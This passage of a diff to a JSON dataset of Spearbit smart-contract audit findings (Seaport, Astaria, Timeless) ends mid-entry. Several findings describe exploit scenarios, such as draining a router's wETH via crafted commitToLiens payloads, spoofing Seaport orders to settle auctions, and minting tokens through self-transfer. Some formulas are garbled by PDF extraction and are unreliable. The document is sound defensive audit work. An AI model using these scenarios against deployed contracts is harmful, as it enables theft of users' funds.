+ "title": "ClearingHouse cannot detect if a call from Seaport comes from a genuine listing or auction", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Anyone can create a SeaPort order with one of the considerations' recipients set to a ClearingHouse with a collateralId that is genuinely already set for auction. Once the spoofed order settles, SeaPort calls into this fallback function and causes the genuine Astaria auction to settle. This allows an attacker to set random items on sale on SeaPort with funds directed here (small buying prices) to settle genuine Astaria auctions on the protocol. This causes: The Astaria auction payees and the liquidator would not receive what they would expect that should come from the auction. And if payee is a public vault it would introduce incorrect parameters into its system. Lien data (s.lienMeta[lid]) and the lien token get deleted/burnt. Collateral token and data get burnt/deleted. When the actual genuine auction settles and calls back s.collateralIdToAuction[collateralId] check. to here, it will revert due to", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "_contractNonces[offerer] gets incremented even if the generateOrder(...)'s return data does not satisfy all the constrainsts.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "_contractNonces[offerer] gets incremented even if the generateOrder(...)'s return data does not satisfy all the constraints. This is the case when errorBuffer !=0 and revertOnInvalid == false (ful- fillAvailableOrders, fulfillAvailableAdvancedOrders). In this case, Seaport would not call back into the contract offerer's ratifyOrder(...) endpoint. Thus, the next time this offerer receives a ratifyOrder(...) call from Seaport, the nonce shared with it might have incremented more than 1.", + "title": "c.lienRequest.strategy.vault is not checked to be a registered vault when commitToLiens is called", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "mentation(c.lienRequest.strategy.vault).commitToLien( ... ) of c.lienRequest.strategy.vault is not checked whether it is a registered vault within the system (by checking s.vaults). The caller can set this value to any address they would desire and potentially perform some unwanted actions. For example, the user could spoof all the values in commitments so that the later dependant contracts' checks are skipped and lastly we end up transferring funds: value after and the s.TRANSFER_PROXY.tokenTransferFrom( address(s.WETH), address(this), // <--- AstariaRouter address(msg.sender), totalBorrowed ); Not that since all checks are skipped, the caller can also indirectly set totalBorrowed to any value they would desire. And so, if AstariaRouter would hold any wETH at any point in time. Anyone can craft a payload to commitToLiens to drain its wETH balance.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Users need to be cautious about what proxied/modified Seaport or Conduit instances they approve their tokens to", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Seaport ( S ) uses EIP-712 domain separator to make sure that when users sign orders, the signed orders only apply to that specific Seaport by pinpointing its name, version, the chainid, and its address. The domain separator is calculated and cached once the Seaport contract gets deployed. The domain separator only gets recalculated when/if the chainid changes (in the case of a hard fork for example). Some actors can take advantage of this caching mechanism by deploying a contract ( S0 ) that : Delegates some of its endpoints to Seaport or it's just a proxy contract. Its codebase is almost identical to Seaport except that the domain separator actually replicates what the original Seaport is using. This only requires 1 or 2 lines of code change (in this case the caching mechanism is not important) function _deriveDomainSeparator() { ... // Place the address of this contract in the next memory location. mstore(FourWords, MAIN_SEAPORT_ADDRESS) // <--- modified line and perhaps the actor can define a ,! named constant Assume a user approves either: 1. Both the original Seaport instance and the modified/proxied instance or, 2. A conduit that has open channels to both the original Seaport instance and the modified/proxied instance. And signs an order for the original Seaport that in the 1st case doesn't use any conduits or in the 2nd case the order uses the approved conduit with 2 open channels. Then one can use the same signature once with the original Seaport and once with the modified/proxied one to receive more tokens than offerer / user originally had intended to sell.", + "title": "Anyone can take a loan out on behalf of any collateral holder at any terms", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In the _validateCommitment() function, the initial checks are intended to ensure that the caller who is requesting the lien is someone who should have access to the collateral that it's being taken out against. The caller also inputs a receiver, who will be receiving the lien. In this validation, this receiver is checked against the collateral holder, and the validation is approved in the case that receiver == holder. However, this does not imply that the collateral holder wants to take this loan. This opens the door to a malicious lender pushing unwanted loans on holders of collateral by calling commitToLien with their collateralId, as well as their address set to the receiver. This will pass the receiver == holder check and execute the loan. In the best case, the borrower discovers this and quickly repays the loan, incurring a fee and small amount of interest. In the worst case, the borrower doesn't know this happens, and their collateral is liquidated.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "ZoneInteraction contains logic for both zone and contract offerers", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "ZoneInteraction contains logic for both zone and contract offerers.", + "title": "Strategist Interest Rewards will be 10x higher than expected due to incorrect divisor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "VAULT_FEE is set as an immutable argument in the construction of new vaults, and is intended to be set in basis points. However, when the strategist interest rewards are calculated in _handleStrategistIntere- stReward(), the VAULT_FEE is only divided by 1000. The result is that the fee calculated by the function will be 10x higher than expected, and the strategist will be dramatically overpaid.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Orders of CONTRACT order type can lower the value of a token offered", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Sometimes tokens have extra value because of the derived tokens owned by them (for example an accessory for a player in a game). With the introduction of contract offerer, one can create a contract offerer that automatically lowers the value of a token, for example, by transferring the derived connected token to a different item when Seaport calls the generateOrder(...). When such an order is included in a collection of orders the only way to ensure that the recipient of the item will hold a token which value hasn't depreciated during the transaction is that the recipient would also need to use a kind of mirrored order that incorporates either a CONTRACT or restricted order type that can do a post-transfer check.", + "title": "The lower bound for liquidationInitialAsk for new lines needs to be stricter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "params.lien.details.liquidationInitialAsk ( Lnew ) is only compared to params.amount ( Anew ) whereas in _appendStack newStack[j].lien.details.liquidationInitialAsk ( Lj ) is compared to poten- tialDebt. potentialDebt is the aggregated sum of all potential owed amount at the end of each position/lien. So in _appendStack we have: onew + on + (cid:1) (cid:1) (cid:1) + oj (cid:20) Lj Where oj potential interest at the end of its term. is _getOwed(newStack[j], newStack[j].point.end) which is the amount for the stack slot plus the So it would make sense to enforce a stricter inequality for Lnew : (1 + r (tend (cid:0) tnow ) 1018 )Anew = onew (cid:20) Lnew The big issue regarding the current lower bound is when the borrower only takes one lien and for this lien liqui- dationInitialAsk == amount (or they are close). Then at any point during the lien term (maybe very close to the end), the borrower can atomically self liquidate and settle the Seaport auction in one transaction. This way the borrower can skip paying any interest (they would need to pay OpenSea fees and potentially royalty fees) and plus they would receive liquidation fees.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Restricted order checks in case where offerer and the fulfiller are the same", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Seaport 1.2 disallowed skipping restricted order checks when offerrer and fulfiller are the same. Remove special-casing for offerer-fulfilled restricted orders: Offerers may currently bypass restricted order checks when fulfilling their own orders. This complicates reasoning about restricted order validation, can aid in the deception of other offerers or fulfillers in some unusual edge cases, and serves little practical use. However, in the case of the offerer == fulfiller == zone, the check continues to be skipped.", + "title": "commitToLiens transfers extra assets to the borrower when protocol fee is present", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "totalBorrowed is the sum of all commitments[i].lienRequest.amount But if s.feeTo is set, some of funds/assets from the vaults get transefered to s.feeTo when _handleProtocolFee is called and only the remaining is sent to the ROUTER(). So in this scenario, the total amount of assets sent to ROUTER() (so that it can be transferred to msg.sender) is up to rounding errors: (1 (cid:0) np dp )T Where: T is the totalBorrowed np is s.protocolFeeNumerator dp is s.protocolFeeDenominator But we are transferring T to msg.sender which is more than we are supposed to send,", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Clean up inline documentation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The comments highlighted in Context need to be removed or updated. Remove the following: 73 ConsiderationEncoder.sol:216: // @todo Dedupe some of this ConsiderationEncoder.sol:316: // @todo Dedupe some of this ZoneInteraction.sol:97: // bytes memory callData; ZoneInteraction.sol:100: // function(bytes32) internal view errorHandler; ZoneInteraction.sol:182: // let magicValue := shr(224, mload(callData)) ConsiderationStructs.sol#L167 and ZoneInteraction.sol#L82 contain an outdated comment about the extraData attribute. There is no longer a staticcall being done, and the function isValidOrderIn- cludingExtraData no longer exists. The NatSpec comment for _assertRestrictedAdvancedOrderValidity mentions: /** * @dev Internal view function to determine whether an order is a restricted * * * * * order and, if so, to ensure that it was either submitted by the offerer or the zone for the order, or that the zone returns the expected magic value upon performing a staticcall to `isValidOrder` or `isValidOrderIncludingExtraData` depending on whether the order fulfillment specifies extra data or criteria resolvers. A few of the facts are not correct anymore: * This function is not a view function anymore and change the storage state either for a zone or a contract offerer. * It is not only for restricted orders but also applies to orders of CONTRACT order type. * It performs actuall calls and not staticcalls anymore. * it calls the isValidOrder endpoint of a zone or the ratifyOrder endpoint of a contract offerer depending on the order type. * If it is dealing with a restricted order, the check is only skipped if the msg.sender is the zone. Seaport is called by the offerer for a restricted order, the call to the zone is still performed. If Same comments apply to _assertRestrictedBasicOrderValidity excluding the case when order is of CONTRACT order type. Typos in TransferHelperErrors.sol - * @dev Revert with an error when a call to a ERC721 receiver reverts with + * @dev Revert with an error when a call to an ERC721 receiver reverts with The @ NatSpec fields have an extra space in Consideration.sol: * @ The extra space can be removed.", + "title": "Withdraw proxy's claim() endpoint updates public vault's yIntercept incorrectly.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Let parameter description y0 n En(cid:0)1 Bn(cid:0)1 Wn(cid:0)1 Sn(cid:0)1 Sv Bv V the yIntercept of our public vault in the question. the current epoch for the public vault. the expected storage parameter of the previous withdraw proxy. the asset balance of the previous withdraw proxy. the withdrawReserveReceived of the previous withdraw proxy. the total supply of the previous withdraw proxy. the total supply of the public vault when processEpoch() was last called on the public vault. the total balance of the public vault when processEpoch() was last called on the public vault. the public vault. 28 parameter description Pn(cid:0)1 the previous withdraw proxy. Then y0 is updated/decremented according to the formula (up to rounding errors due to division): y0 = y0 (cid:0) max(0, En(cid:0)1 (cid:0) (Bn(cid:0)1 (cid:0) Wn(cid:0)1))(1 (cid:0) Sn(cid:0)1 Sv ) Whereas the amount ( A ) of assets transfered from Pn(cid:0)1 to V is And the amount ( B ) of asset left in Pn(cid:0)1 after this transfer would be: A = (Bn(cid:0)1 (cid:0) Wn(cid:0)1)(1 (cid:0) Sn(cid:0)1 Sv ) B = Wn(cid:0)1 + (Bn(cid:0)1 (cid:0) Wn(cid:0)1) Sn(cid:0)1 Sv (cid:1) (Bn(cid:0)1 (cid:0) Wn(cid:0)1) is supposed to represent the payment withdrawal proxy receives from Seaport auctions plus the amount of assets transferred to it by external actors. So A represents the portion of this amount for users who have not withdrawn from the public vault on the previous epoch and it is transferred to V and so y0 should be compensated positively. Also note that this amount might be bigger than En(cid:0)1 if a lien has a really high liquida- tionInitialAsk and its auction fulfills/matches near that price on Seaport. So it is possible that En(cid:0)1 < A. The current update formula for updating the y0 has the following flaws: It only considers updating y0 when En(cid:0)1 (cid:0) (Bn(cid:0)1 (cid:0) Wn(cid:0)1) > 0 which is not always the case. Decrements y0 by a portion of En(cid:0)1. The correct updating formula for y0 should be: y0 = y0 (cid:0) En(cid:0)1 + (Bn(cid:0)1 (cid:0) Wn(cid:0)1)(1 (cid:0) Sn(cid:0)1 Sv ) Also note, if we let Bn(cid:0)1 (cid:0) Wn(cid:0)1 = Xn(cid:0)1 + (cid:15), where Xn(cid:0)1 is the payment received by the withdraw proxy from Seaport auction payments and (cid:15) (if Wn(cid:0)1 updated correctly) be assets received from external actors by the previous withdraw proxy. Then: B = Wn(cid:0)1 + (Xn(cid:0)1 + (cid:15)) Sn(cid:0)1 Sv (cid:1) = h max(0, Bv (cid:0) En(cid:0)1) + Xn(cid:0)1 + (cid:15) i Sn(cid:0)1 Sv (cid:1) The last equality comes from the fact that when the withdraw reserves is fully transferred from the public vault and the current withdraw proxy (if necessary) to the previous withdraw proxy the amount Wn(cid:0)1 would hold should be max(0, Bv (cid:0) En(cid:0)1) Sn(cid:0)1 . Sv (cid:1) Related Issue.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Consider writing tests for hard coded constants in ConsiderationConstants.sol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "There are many hard coded constants, most being function selectors, that should be tested against.", + "title": "Public vault's yIntercept is not updated when the full amount owed is not paid out by a Seaport auction.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When the full amountOwed for a lien is not paid out during the callback from Seaport to a collateral's ClearingHouse and if the payee is a public vault, we would need to decrement the yIntercept, otherwise the payee.totalAssets() would reflect a wrong value.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Unused / Redundant imports in ZoneInteraction.sol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "There are multiple unused / redundant imports.", + "title": "LienToken payee not reset on transfer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "payee and ownerOf are detached in that owners may set payee and owner may transfer the LienTo- ken to a new owner. payee does not reset on transfer. Exploit scenario: Owner of a LienToken sets themselves as payee Owner of LienToken sells the lien to a new owner New owner does not update payee Payments go to address set by old owner", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Orders of CONTRACT order type do not enforce a usage of a specific conduit", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "None of the endpoints (generateOrder and ratifyOrder) for an order of CONTRACT order type en- force using a specific conduit. A contract offerer can enforce the usage of a specific conduit or just Seaport by setting allowances or approval for specific tokens. If a caller calls into different Seaport endpoints and does not provide the correct conduit key, then the order would revert. Currently, the ContractOffererInterface interface does not have a specific endpoint to discover which conduits the contract offerer would prefer users to use. getMetadata() would be able to return a metadata that encodes the conduit key. For (advanced) orders of not CONTRACT order types, the offerer would sign the order and the conduit key is included in the signed hash. Thus, the conduit is enforced whenever that order gets included in a collection by an actor calling Seaport.", + "title": "WithdrawProxy allows redemptions before PublicVault calls transferWithdrawReserve", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Anytime there is a withdraw pending (i.e. someone holds WithdrawProxy shares), shares may be redeemed so long as totalAssets() > 0 and s.finalAuctionEnd == 0. Under normal operating conditions totalAssets() becomes greater than 0 when then PublicVault calls trans- ferWithdrawReserve. totalAssets() can also be increased to a non zero value by anyone transferring WETH to the contract. If this occurs and a user attempts to redeem, they will receive a smaller share than they are owed. Exploit scenario: Depositor redeems from PublicVault and receives WithdrawProxy shares. Malicious actor deposits a small amount of WETH into the WithdrawProxy. Depositor accidentally redeems, or is tricked into redeeming, from the WithdrawProxy while totalAssets() is smaller than it should be. PublicVault properly processes epoch and full withdrawReserve is sent to WithdrawProxy. All remaining holders of WithdrawProxy shares receive an outsized share as the previous shares we re- deemed for the incorrect value.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Calls to Seaport that would fulfill or match a collection of advanced orders can be front-ran to claim any unused offer items", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Calls to Seaport that would fulfill or match a collection of advanced orders can be front-ran to claim any unused offer items. These endpoints include: fulfillAvailableOrders fulfillAvailableAdvancedOrders matchOrders matchAdvancedOrders Anyone can monitor the mempool to find calls to the above endpoints and calculate if there are any unused offer item amounts. If there are unused offer item amounts, the actor can create orders with no offer items, but with consideration items mirroring the unused offer items and populate the fulfillment aggregation data to match the 84 unused offer items with the new mirrored consideration items. It is possible that the call by the actor would be successful under certain conditions. For example, if there are orders of CONTRACT order type involved, the contract offerer might reject this actor (the rejection might also happen by the zones used when validating the order). But in general, this strategy can be implemented by anyone.", + "title": "Point.position is not updated for stack slots in _removeStackPosition", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "uint8(params.stack.length) which would be its index in the stack. When _removeStackPosition is called to remove a slot newStack[i].point.position is not updated for indexes that are greater than position in the original stack. Also slot.point.position is only used when we emit AddLien and LienStackUpdated events. In both of those cases, we could have used params.stack.length", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "Advance orders of CONTRACT order types can generate orders with more offer items and the extra offer items might not end up being used.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When Seaport gets a collection of advanced orders to fulfill or match, if one of the orders has a CON- TRACT order type, Seaport calls the generateOrder(...) endpoint of that order's offerer. generateOrder(...) can provide extra offer items for this order. These extra offer items might have not been known beforehand by the caller. And if the caller would not incorporate the indexes for the extra items in the fulfillment aggregation data, the extra items would end up not being aggregated into any executions.", + "title": "unchecked may cause under/overflows", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "unchecked should only be used when there is a guarantee of no underflows or overflows, or when they are taken into account. In absence of certainty, it's better to avoid unchecked to favor correctness over gas efficiency. For instance, if by error, protocolFeeNumerator is set to be greater than protocolFeeDenominator, this block in _handleProtocolFee() will underflow: PublicVault.sol#L640, unchecked { amount -= fee; } However, later this reverts due to the ERC20 transfer of an unusually high amount. This is just to demonstrate that unknown bugs can lead to under/overflows.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk PublicVault.sol#L563, LienToken.sol#L424, LienToken.sol#L482, PublicVault.sol#L376, PublicVault.sol#L422, Public-" ] }, { - "title": "Typo for the index check comment in _aggregateValidFulfillmentConsiderationItems", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "There is a typo in _aggregateValidFulfillmentConsiderationItems: // Retrieve item index using an offset of the fulfillment pointer. let itemIndex := mload( add(mload(fulfillmentHeadPtr), Fulfillment_itemIndex_offset) ) // Ensure that the order index is not out of range. <---------- the line with typo if iszero(lt(itemIndex, mload(considerationArrPtr))) { throwInvalidFulfillmentComponentData() } The itemIndex above refers to the index in consideration array and not the order.", + "title": "Multiple ERC4626Router and ERC4626RouterBase functions will always revert", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The intention of the ERC4626Router.sol functions is that they are approval-less ways to deposit and redeem: // For the below, no approval needed, assumes vault is already max approved As long as the user has approved the TRANSFER_PROXY for WETH, this works for the depositToVault function: WETH is transferred from user to the router with pullTokens. The router approves the vault for the correct amount of WETH. vault.deposit() is called, which uses safeTransferFrom to transfer WETH from router into vault. However, for the redeemMax function, it doesn't work: Approves the vault to spend the router's WETH. vault.redeem() is called, which tries to transfer vault tokens from the router to the vault, and then mints withdraw proxy tokens to the receiver. This error happens assuming that the vault tokens would be burned, in which case the logic would work. But since they are transferred into the vault until the end of the epoch, we require approvals. The same issue also exists in these two functions in ERC4626RouterBase.sol: redeem(): this is where the incorrect approval lives, so the same issue occurs when it is called directly. withdraw(): the same faulty approval exists in this function.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "Document the unused parameters for orders of CONTRACT order type", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "If an advance order advancedOrder is of CONTRACT order type, certain parameters are not being used in the code base, specifically: numerator: only used for skipping certain operations (see AdvancedOrder.numerator and AdvancedOrder.denominator are unchecked for orders of CONTRACT order type) denominator: -- signature: -- parameters.zone: only used when emitting the OrderFulfilled event. parameters.offer.endAmount: endAmount and startAmount for offer items will be set to the amount sent back by generateOrder for the corresponding item. parameters.consideration.endAmount: endAmount and startAmount for consideration items will be set to the amount sent back by generateOrder for the corresponding item parameters.consideration.recipient: the offerer contract returns new recipients when generateOrder gets called parameters.zoneHash: -- parameters.salt: -- parameters.totalOriginalConsiderationItems: --", + "title": "UniV3 tokens with fees can bypass strategist checks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Each UniV3 strategy includes a value for fee in nlrDetails that is used to constrain their strategy to UniV3 pools with matching fees. This is enforced with the following check (where details.fee is the strategist's set fee, and fee is the fee returned from Uniswap): if (details.fee != uint24(0) && fee != details.fee) { revert InvalidFee(); } 33 This means that if you set details.fee to 0, this check will pass, even if the real fee is greater than zero.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "The check against totalOriginalConsiderationItems is skipped for orders of CONTRACT order type", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "compares dOrder.parameters.consideration.length: The AdvancedOrder.parameters.totalOriginalConsiderationItems inequality following skipped orders for of is CONTRACT order with type which Advance- // Ensure supplied consideration array length is not less than the original. if (suppliedConsiderationItemTotal < originalConsiderationItemTotal) { _revertMissingOriginalConsiderationItems(); }", + "title": "If auction time is reduced, withdrawProxy can lock funds from final auctions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When a new liquidation happens, the withdrawProxy sets s.finalAuctionEnd to be equal to the new incoming auction end. This will usually be fine, because new auctions start later than old auctions, and they all have the same length. However, if the auction time is reduced on the Router, it is possible for a new auction to have an end time that is sooner than an old auction. The result will be that the WithdrawProxy is claimable before it should be, and then will lock and not allow anyone to claim the funds from the final auction.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "getOrderStatus returns the default values for orderHash that is derived for orders of CONTRACT order type", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Since the _orderStatus[orderHash] does not get set for orders of CONTRACT order type, getOrder- Status would always returns (false, false, 0, 0) for those hashes (unless there is a hash collision with other types of orders)", + "title": "claim() will underflow and revert for all tokens without 18 decimals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In the claim() function, the amount to decrease the Y intercept of the vault is calculated as: (s.expected - balance).mulWadDown(10**ERC20(asset()).decimals() - s.withdrawRatio) s.withdrawRatio is represented as a WAD (18 decimals). As a result, using any token with a number of decimals under 17 (assuming the withdraw ratio is greater than 10%) will lead to an underflow and cause the function to revert. In this situation, the token's decimals don't matter. They are captured in the s.expected and balance, and are also the scale at which the vault's y-intercept is measured, so there's no need to adjust for them. Note: I know this isn't a risk in the current implementation, since it's WETH only, but since you are planning to generalize to accept all ERC20s, this is important.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "validate skips CONTRACT order types but cancel does not", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When validating orders validate skips any order of CONTRACT order type, but cancel does not skip these order types. When fulfilling or matching orders for CONTRACT order types, _orderStatus does not get checked or populated. But in cancel the isValidated and the isCancelled fields get set. This is basically a no-op for these order types.", + "title": "Call to Royalty Engine can block NFT auction", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "_generateValidOrderParameters() calls ROYALTY_ENGINE.getRoyaltyView() twice. The first call is wrapped in a try/catch. This lets Astaria to continue even if the getRoyaltyView() reverts. However, the second call is not safe from this. Both these calls have the same parameters passed to it except the price (startingPrice vs endingPrice). case they are different, there exists a possibility that the second call can revert. In", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "The literal 0x1c used as the starting offset of a custom error in a revert statement can be replaced by the named constant Error_selector_offset", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In the context above, 0x1c is used to signal the start of a custom error block saved in the memory: revert(0x1c, _LENGTH_) For the above literal, we also have a named constant defined in ConsiderationConstants.sol#L410: uint256 constant Error_selector_offset = 0x1c; The named constant Error_selector_offset has been used in most places that a custom error is reverted in an assembly block.", + "title": "Expired liens taken from public vaults need to be liquidated otherwise processing an epoch halts/reverts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "s.epochData[s.currentEpoch].liensOpenForEpoch is decremented or is supposed to be decre- mented, when for a lien with an end that falls on this epoch: The full payment has been made, Or the lien is bought out by a lien that is from a different vault or ends at a higher epoch, Or the lien is liquidated. If for some reason a lien expires and no one calls liquidate, then s.epochData[s.currentEpoch].liensOpenForEpoch > 0 will be true and processEpoch() would revert till someones calls liquidate. Note that a lien's end falling in the s.currentEpoch and timeToEpochEnd() == 0 imply that the lien is expired. 35", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "Mint PerpetualYieldTokens for free by self-transfer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The PYT.transfer and transferFrom functions operate on cached balance values. When transfer- ring tokens to oneself the decreased balance is overwritten by an increased balance which makes it possible to mint PYT tokens for free. Consider the following exploit scenario: Attacker A self-transfers by calling token.transfer(A, token.balanceOf(A)). balanceOf[msg.sender] is rst set to zero but then overwritten by balanceOf[to] = toBalance + amount, doubling As balance.", + "title": "assets < s.depositCap invariant can be broken for public vaults with non-zero deposit caps", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The following check in mint / deposit does not take into consideration the new shares / amount sup- plied to the endpoint, since the yIntercept in totalAssets() is only updated after calling super.mint(shares, receiver) or super.deposit(amount, receiver) with the afterDeposit hook. uint256 assets = totalAssets(); if (s.depositCap != 0 && assets >= s.depositCap) { revert InvalidState(InvalidStates.DEPOSIT_CAP_EXCEEDED); } Thus the new shares or amount provided can be a really big number compared to s.depositCap, but the call will still go through.", "labels": [ "Spearbit", - "Timeless", - "Severity: Critical Risk" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "xPYT auto-compound does not take pounder reward into account", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "Conceptually, the xPYT.pound function performs the following steps: 1. Claims yieldAmount yield for itself, deposits the yield back to receive more PYT/NYT (Gate.claimYieldEnter). 2. Buys xPYT with the NYT. 3. Performs a ERC4626.redeem(xPYT) with the bought amount, burning xPYT and receiving pytAmountRedeemed PYT. 4. Performs a ERC4626.deposit(pytAmountRedeemed + yieldAmount = pytCompounded). 5. Pays out a reward in PYT to the caller. The assetBalance is correctly updated for the rst four steps but does not decrease by the pounder reward which is transferred out in the last step. The impact is that the contract has a smaller assets (PYT) balance than what is tracked in assetBalance. 1. Future depositors will have to make up for it as sweep computes the difference between these two values. 2. The xPYT exchange ratio is wrongly updated and withdrawers can redeem xPYT for more assets than they should until the last withdrawer is left holding valueless xPYT. Consider the following example and assume 100% fees for simplicity i.e. pounderReward = pytCompounded. Vault total: 1k assets, 1k shares total supply. pound with 100% fee: claims Y PYT/NYT. swaps Y NYT to X xPYT. redeems X xPYT for X PYT by burning X xPYT (supply -= X, exchange ratio is 1-to-1 in example). assetBalance is increased by claimed Y PYT pounder receives a pounder reward of X + Y PYT but does not decrease assetBalance by pounder reward X+Y. Vault totals should be 1k-X assets, 1k-X shares, keeping the same share price. Nevertheless, vault totals actually are 1k+Y assets, 1k-X shares. Although pounder receives 100% of pound- ing rewards the xPYT price (assets / shares) increased.", + "title": "redeemFutureEpoch transfers the shares from the msg.sender to the vault instead of from the owner", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "redeemFutureEpoch transfers the vault shares from the msg.sender to the vault instead of from the owner.", "labels": [ "Spearbit", - "Timeless", - "Severity: High Risk" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "Wrong yield accumulation in claimYieldAndEnter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The claimYieldAndEnter function does not accrue yield to the Gate contract itself (this) in case xPYT was specied. The idea is to accrue yield for the mint recipient rst before increasing/reducing their balance to not interfere with the yield rewards computation. However, in case xPYT is used, tokens are minted to the Gate before its yield is accrued. Currently, the transfer from this to xPYT through the xPYT.deposit call accrues yield for this after the tokens have been minted to it (userPYTBalance * (updatedYieldPerToken - actualUserYieldPerToken) / PRECI- SION) and its balance increased. This leads to it receiving a larger yield amount than it should have.", + "title": "Lien buyouts can push maxPotentialDebt 